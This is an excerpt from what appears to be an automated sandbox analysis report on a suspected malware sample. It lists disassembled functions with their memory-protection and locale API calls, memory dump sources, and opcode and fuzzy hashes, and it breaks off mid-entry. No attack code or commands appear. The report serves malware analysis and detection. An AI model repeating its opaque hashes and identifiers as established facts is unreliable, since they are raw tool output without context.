                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: HP<3$P5BE
                                • API String ID: 544645111-576570839
                                • Opcode ID: 2021d55fa8aa17d553e05794a1f5d0b9edc96f122bb54eae5959c8f279ce0fc1
                                • Instruction ID: 2a69b7df65f5f56e80ddb262efc77c00da115dec51d01bc6c071464024642058
                                • Opcode Fuzzy Hash: 2021d55fa8aa17d553e05794a1f5d0b9edc96f122bb54eae5959c8f279ce0fc1
                                • Instruction Fuzzy Hash: 387128B1D041799AEB208B64CC58BFEBBB5AF85700F0481FAD84D66680E7385EC1CB52
                                Function 029627E6 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 355memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: KCA2
                                • API String ID: 544645111-1043864701
                                • Opcode ID: a2caef5a53699bf086019be712c6cb48b275f9a8d44b598343df09d9d46ac1cb
                                • Instruction ID: 6bc6977bae2994c39da08c0660ce40a9ee2a8612035a1aeec5834ebbb7c81bf2
                                • Opcode Fuzzy Hash: a2caef5a53699bf086019be712c6cb48b275f9a8d44b598343df09d9d46ac1cb
                                • Instruction Fuzzy Hash: 84E169B5D4426A8BEB24CB24DC98BFAB7B6FB85300F1441FAD84967241D7395EC1CE81
                                Function 02942C5D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: BB4L
                                • API String ID: 544645111-2802313288
                                • Opcode ID: 7d3b235b95e18b7b794f5bf4ac305970a159c52200a0499fee7af20261973ffc
                                • Instruction ID: 4c5980fb6dafa1f728feffee735baf8753f6a1be4dcf0eef812ae0823861afb8
                                • Opcode Fuzzy Hash: 7d3b235b95e18b7b794f5bf4ac305970a159c52200a0499fee7af20261973ffc
                                • Instruction Fuzzy Hash: 2461A4B1D052299BEB248B64DC94BFAB775FF85300F1081FAE90DA6240EA385AC5CF51
                                Function 02962A5C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 143COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: KCA2
                                • API String ID: 544645111-1043864701
                                • Opcode ID: 760e5ea2bc2d441876d92dae181e3d4495cc261f3c805dc8054de233d1d031ed
                                • Instruction ID: cfc3a43b50a678affeff121fbe49a267656240edd88f2965555d823073cd68bd
                                • Opcode Fuzzy Hash: 760e5ea2bc2d441876d92dae181e3d4495cc261f3c805dc8054de233d1d031ed
                                • Instruction Fuzzy Hash: AF51E9B2D0426A5BEB208B74CD98BFABBF5EF81341F0841F9C84D56181D6785EC58F92
                                Function 02962C27 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: BCG9
                                • API String ID: 544645111-2193108473
                                • Opcode ID: 8b9338d83d07224e5625c06c236aa04a90b70e1fa57761cb284419dcb59e6db0
                                • Instruction ID: d2af09b41d250122cf79a6560f421f74b8d18db57aadb53a36c5d9f34f31ee8b
                                • Opcode Fuzzy Hash: 8b9338d83d07224e5625c06c236aa04a90b70e1fa57761cb284419dcb59e6db0
                                • Instruction Fuzzy Hash: 9D51A2B6D442689FE7208B24CC98BEABBB5EF85310F0441F9D94C67680D7395EC68E91
                                Function 029298C3 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 238COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: f92fd06a389e390f53019aab11682ed5c3ad9a907e1d88adb8ca729719fefea4
                                • Instruction ID: 7ef319716f2580b30c221d0c9c225a546efb7bded88687648e30ca834c8c7c56
                                • Opcode Fuzzy Hash: f92fd06a389e390f53019aab11682ed5c3ad9a907e1d88adb8ca729719fefea4
                                • Instruction Fuzzy Hash: F191E1B1E042288AEB248B54DC44BEAB775FF84310F2481FAD94D67284E7785EC9CF91
                                Function 00414BD3 Relevance: 2.0, APIs: 1, Instructions: 520nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: e6c92503a33f5a3869f5afb8e7f544aaae516f18f07a47577cb61252836641fa
                                • Instruction ID: 06811f5268e4c7007e7f35785b738c9da203cb5cb768bb6b9defc2452c994e7b
                                • Opcode Fuzzy Hash: e6c92503a33f5a3869f5afb8e7f544aaae516f18f07a47577cb61252836641fa
                                • Instruction Fuzzy Hash: 4D129FB1D046289BEB248B15DC94BEBB775EB85310F1481EAE80E97640D7385FC2CF96
                                Function 0294265F Relevance: 2.0, APIs: 1, Instructions: 480memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 37aca543246d27321978446009ef46b4c402ecfb461bffc841b22f4ae6c9f467
                                • Instruction ID: 402ad5bfa31b78e911305430148d2d13c13074a97a44db98c0733af9166c2bbd
                                • Opcode Fuzzy Hash: 37aca543246d27321978446009ef46b4c402ecfb461bffc841b22f4ae6c9f467
                                • Instruction Fuzzy Hash: CC127DB1D052299BEB24CB24DC94FEAB7B6FB84310F1441FAE809A6241DB395EC5CF51
                                Function 00414073 Relevance: 1.8, APIs: 1, Instructions: 334nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00414407
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 0653e3590ba339b19214c555b71e3c355d62d481b9a398cd865a43def61d066f
                                • Instruction ID: 3f314c2593dc6b407e6b561a2574f481002bd67d4b7bfaacc7da0ed4a23cb33b
                                • Opcode Fuzzy Hash: 0653e3590ba339b19214c555b71e3c355d62d481b9a398cd865a43def61d066f
                                • Instruction Fuzzy Hash: 0CE171B1E046288BEB24CB04DD80BEA77B5FB85305F1081EAD90E67741DB386EC28F55
                                Function 00415683 Relevance: 1.8, APIs: 1, Instructions: 314nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: a94c331962f9b7fd4a4a937a5d26df14fbde6cfacee049ce0d6527fc03f08267
                                • Instruction ID: fa1ad4bce8c26bedcc00884bab8c12a8e765e48cff4ac5f0fb3961131177c787
                                • Opcode Fuzzy Hash: a94c331962f9b7fd4a4a937a5d26df14fbde6cfacee049ce0d6527fc03f08267
                                • Instruction Fuzzy Hash: 46D13DB0D04628CBEB24CB14CC90AEAB7B5FB85315F2482EAD84957741D7385ED1CF56
                                Function 029421C9 Relevance: 1.8, APIs: 1, Instructions: 303COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea12b6b149eaa7ea811b1afab62322f5768666ad9b4cc95c3c5fca5afc0b2a90
                                • Instruction ID: b67b8f0065bf60ed16704669b227bffe3424dbe793751840558ffdb2830ed010
                                • Opcode Fuzzy Hash: ea12b6b149eaa7ea811b1afab62322f5768666ad9b4cc95c3c5fca5afc0b2a90
                                • Instruction Fuzzy Hash: 5CC1F2B1E082689AFB20CB24DC44BEBB775EF85300F1440F9D94DA7681E7795AC5CB26
                                Function 0041DB63 Relevance: 1.8, APIs: 1, Instructions: 281memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0041E720
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 0e14e6dd54dfa33c9f9191793acae5ea6c643a57b21e62ba3802395b5539856b
                                • Instruction ID: ea9475aaf84c90d03e26f4fe69bce158bab996aef497ccfa93ce8eb307b47aac
                                • Opcode Fuzzy Hash: 0e14e6dd54dfa33c9f9191793acae5ea6c643a57b21e62ba3802395b5539856b
                                • Instruction Fuzzy Hash: DDC192B5D046288BE724CF14DC94AEAB7B5EF85305F1442EAD84D67344D638AFC2CE91
                                Function 00405549 Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1de122c5e3d1c5abbecc9a6568d886ae5d52626750e6fb6e47592f7df5d60607
                                • Instruction ID: 142968927670bf6e8684e60bf5a21c067de74e5a99ff5f05f77ebf6c6511b28c
                                • Opcode Fuzzy Hash: 1de122c5e3d1c5abbecc9a6568d886ae5d52626750e6fb6e47592f7df5d60607
                                • Instruction Fuzzy Hash: 4391BEB1D145289FEB24CA10DC91BFB7775EF84310F1441FAE80AA6280E6786EC18F66
                                Function 00414B29 Relevance: 1.7, APIs: 1, Instructions: 236nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: aada88f94dbe90619bfda251951cec9d7211785ad236fcc07db0793e538a486d
                                • Instruction ID: 2bdbfeeb07a83b081b1dec05c2de7949678f3e80a81045c40057b8e986f634d2
                                • Opcode Fuzzy Hash: aada88f94dbe90619bfda251951cec9d7211785ad236fcc07db0793e538a486d
                                • Instruction Fuzzy Hash: 9481D2B2D146299AEB208B21DC84BFBB774EF85320F1041FAD80E97640D63D5AC6DF56
                                Function 02962F05 Relevance: 1.7, APIs: 1, Instructions: 220memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 8d9b77e88ac282eeb6730faa719dd4ba6de52049ca9a6acffb3f79792b8b4f52
                                • Instruction ID: c922c7a547c83f2aac3e94061e4ead4a06789d052afea5e1487cbb7d5ac48645
                                • Opcode Fuzzy Hash: 8d9b77e88ac282eeb6730faa719dd4ba6de52049ca9a6acffb3f79792b8b4f52
                                • Instruction Fuzzy Hash: 598190B2D002689BEB248B25DC98BEAB7B9FF85300F0441FAD94D66680D7795EC1CF51
                                Function 02942E10 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 593bdc4a22e73c13261413a9bcaa09d05b440263cba2c620499202e8e6b4e43b
                                • Instruction ID: e0f4415609408ba2c1c2b1e6bcac052f9eaded528f64dd29debf4e5a8270ff27
                                • Opcode Fuzzy Hash: 593bdc4a22e73c13261413a9bcaa09d05b440263cba2c620499202e8e6b4e43b
                                • Instruction Fuzzy Hash: B08192B2D052199BEB248B64DC94FEAB775FF85300F1481FAE90DA7240DA385AC5CF61
                                Function 00414293 Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 82a09534369ed8db59abc299b0d0d73b34177ce6d23c2d6ef2b7eb4abd644d9f
                                • Instruction ID: 2ccb4b8e1b828111da187549b73b7bed09631c9581142b349aeca521cb4aecd7
                                • Opcode Fuzzy Hash: 82a09534369ed8db59abc299b0d0d73b34177ce6d23c2d6ef2b7eb4abd644d9f
                                • Instruction Fuzzy Hash: 2181E6B1E045689BE7148B14DC90BFA7775EBC1311F1480FAD90D96A41EA3C5FC28F56
                                Function 00414BC4 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: efc6114b38ede870f19572a077ce8f34e433136dba90b70f0f5652e4ce93a679
                                • Instruction ID: deb1ee1084e10d5d0929472a2541515f9af84c7b9dbf1a65036e5e419ba0d0ef
                                • Opcode Fuzzy Hash: efc6114b38ede870f19572a077ce8f34e433136dba90b70f0f5652e4ce93a679
                                • Instruction Fuzzy Hash: B06105B2D046259AEB248B25EC80BFB7774EF85310F1441FAE80D96640E63C4AC6DF57
                                Function 02942C4F Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 177bde6d0d94c86387381810c638286f39866f2e7bff8b94b48bfc2557ad3d8f
                                • Instruction ID: 72ca93fcf9d026189b2bb10eff6543fcb08192198606117ba36d75c8f4736b80
                                • Opcode Fuzzy Hash: 177bde6d0d94c86387381810c638286f39866f2e7bff8b94b48bfc2557ad3d8f
                                • Instruction Fuzzy Hash: FB61B6B1D052199BEB248B64DC95BFAB775FF85300F1081FAE90DA6240EA385EC5CF51
                                Function 02942D6D Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 58c9814f523deae3784150f85a1bd06827bb5189db4277006f51ce55b349c1f9
                                • Instruction ID: 79d53e7b82b6d3aee354576eb8edd54f47c41fba1f012f7b94a0b6162b44e78b
                                • Opcode Fuzzy Hash: 58c9814f523deae3784150f85a1bd06827bb5189db4277006f51ce55b349c1f9
                                • Instruction Fuzzy Hash: 6671A4B1D042299BEB248B64CC94BFAB775FF85310F1081FAE90966280EB385BC5CF51
                                Function 00415218 Relevance: 1.7, APIs: 1, Instructions: 181nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: e0e1f3954c7ba1c7ef2d66d058b401c352de01454b785b1e63db92682193dc04
                                • Instruction ID: ba3c42fc11e5c63ce657f83179ebfcf7e4a4bbc62507e025c4d75a697608f587
                                • Opcode Fuzzy Hash: e0e1f3954c7ba1c7ef2d66d058b401c352de01454b785b1e63db92682193dc04
                                • Instruction Fuzzy Hash: BF5109F2E14614AAF7148A11DC55AEB7B38EBC1320F1541BFE40E56580E73C5AC6CEA7
                                Function 02962D95 Relevance: 1.7, APIs: 1, Instructions: 167memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 8a5c14b78284407e603fb2979274396953ddd13e2c6c945406deda62e995e29f
                                • Instruction ID: ea1885a3d661d656c6937f6aebab71455ee161c75fec9ea064388a08b6bfc1cf
                                • Opcode Fuzzy Hash: 8a5c14b78284407e603fb2979274396953ddd13e2c6c945406deda62e995e29f
                                • Instruction Fuzzy Hash: 3251B0B2D002689BEB248B24DC98BFABBB5FF95300F0441FAD94D66680D7795EC18F51
                                Function 0041511D Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: cc7421cd6e901b749f81873e3e525c598baa07e0747a900bccec875066570b7d
                                • Instruction ID: 907527cbab6c30aafd24090a91faa0c1f44de54d9e00556d73b04cfc7fc1412b
                                • Opcode Fuzzy Hash: cc7421cd6e901b749f81873e3e525c598baa07e0747a900bccec875066570b7d
                                • Instruction Fuzzy Hash: 2351E8B2D04624EBD7248A15DC94AEBBB78EF82320F1500FFD84E52541E7385AC6CE97
                                Function 00415176 Relevance: 1.7, APIs: 1, Instructions: 154nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: f6e7668ead49a5d1a127073cbaaa2cd0492bcea209efbd2b493bc08d25e48a99
                                • Instruction ID: dc083c8513370b6a7e1b408eb7299ad1963e72714ae03a143a9edf2d6101bc23
                                • Opcode Fuzzy Hash: f6e7668ead49a5d1a127073cbaaa2cd0492bcea209efbd2b493bc08d25e48a99
                                • Instruction Fuzzy Hash: 245105B2D04624DBE7248B15DC94AEBBB78EF82320F1501FBD84D52641E7385AC6CE97
                                Function 0041388D Relevance: 1.7, APIs: 1, Instructions: 153nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00414407
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 0c6ff9d6739e4926aa0a0643dda8a5eac2e34975a8c525105edeafa609ecb5f0
                                • Instruction ID: 623baf64d49f696e28e9638c525d1c9b9a0e241ed33c12b756583b930db3701c
                                • Opcode Fuzzy Hash: 0c6ff9d6739e4926aa0a0643dda8a5eac2e34975a8c525105edeafa609ecb5f0
                                • Instruction Fuzzy Hash: A651B4F2E14614AFF7148A10DC84AFB7379EBC1710F1444BAE90E96681E67C5FC68E26
                                Function 00413CD3 Relevance: 1.7, APIs: 1, Instructions: 151nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00414407
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: cda5d5b588739d34371c18e841c4ff1e3498abe9c5f7afe4ff9c093aa90421ce
                                • Instruction ID: 9aa5f7881466681aa772bf72ee5859fe375fea45ae3c891cb2f3118c0af1c4c9
                                • Opcode Fuzzy Hash: cda5d5b588739d34371c18e841c4ff1e3498abe9c5f7afe4ff9c093aa90421ce
                                • Instruction Fuzzy Hash: 7751E7F2E14514AFF7148A10DC84AFB7379EBC1310F1440BAE90E96681E67C5FC68E26
                                Function 02962C10 Relevance: 1.6, APIs: 1, Instructions: 148memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: c9af2f9548c5ae1509ba3aa328abb2575e5087937a6f67d67b6220f5d661a00b
                                • Instruction ID: 8763bb15a6f345965a3cd4f786c53143d24b1801308f0118148f8483b510f0e9
                                • Opcode Fuzzy Hash: c9af2f9548c5ae1509ba3aa328abb2575e5087937a6f67d67b6220f5d661a00b
                                • Instruction Fuzzy Hash: 6B51B3B2D452689FE7208B24DC98BEABBB5EF85310F0441FAD84D67240D6395EC6CF91
                                Function 02962DFA Relevance: 1.6, APIs: 1, Instructions: 145memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 7847964f7993daaf909e355f1a4f914d50238e67422dad1c7ea268aa2784ebbb
                                • Instruction ID: d9999cfc192f9122c0ded445b51a2b067ed2304464568dc1ea82224f1ef209e9
                                • Opcode Fuzzy Hash: 7847964f7993daaf909e355f1a4f914d50238e67422dad1c7ea268aa2784ebbb
                                • Instruction Fuzzy Hash: CC51F7B2D002689BFB148B25DC98BFBBBB5EB84310F0441FAD94D66680D7395EC18E91
                                Function 029624CD Relevance: 1.6, APIs: 1, Instructions: 122memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 2294c18ed1625ca50271c412fcd8ef200cacdeb9839bdc797664afee6a875cb3
                                • Instruction ID: 51eb89c17dc345e41bf55b68f6de3f604bab8837d0131cdf784a4ca908fcdb1d
                                • Opcode Fuzzy Hash: 2294c18ed1625ca50271c412fcd8ef200cacdeb9839bdc797664afee6a875cb3
                                • Instruction Fuzzy Hash: DF412AB2D042655BE7108B64CC98BF7BFB5AF81310F0981F9C88D67581D6395DC28B92
                                Function 029626B1 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 5c8827778892a454d37fc60e85c8bf59982c7411f6c44357e6cff6166167a900
                                • Instruction ID: 922775413b4f71a20e0cfe8d4b3f9d7d6500b83126f7a419230a35b70a87d6d8
                                • Opcode Fuzzy Hash: 5c8827778892a454d37fc60e85c8bf59982c7411f6c44357e6cff6166167a900
                                • Instruction Fuzzy Hash: 6A4128B2D042656BE7108764CD58AEBBFB5AFC5300F0941F9C88D67181D6395ED2CB92
                                Function 0296274D Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule
                                Memory Dump Source
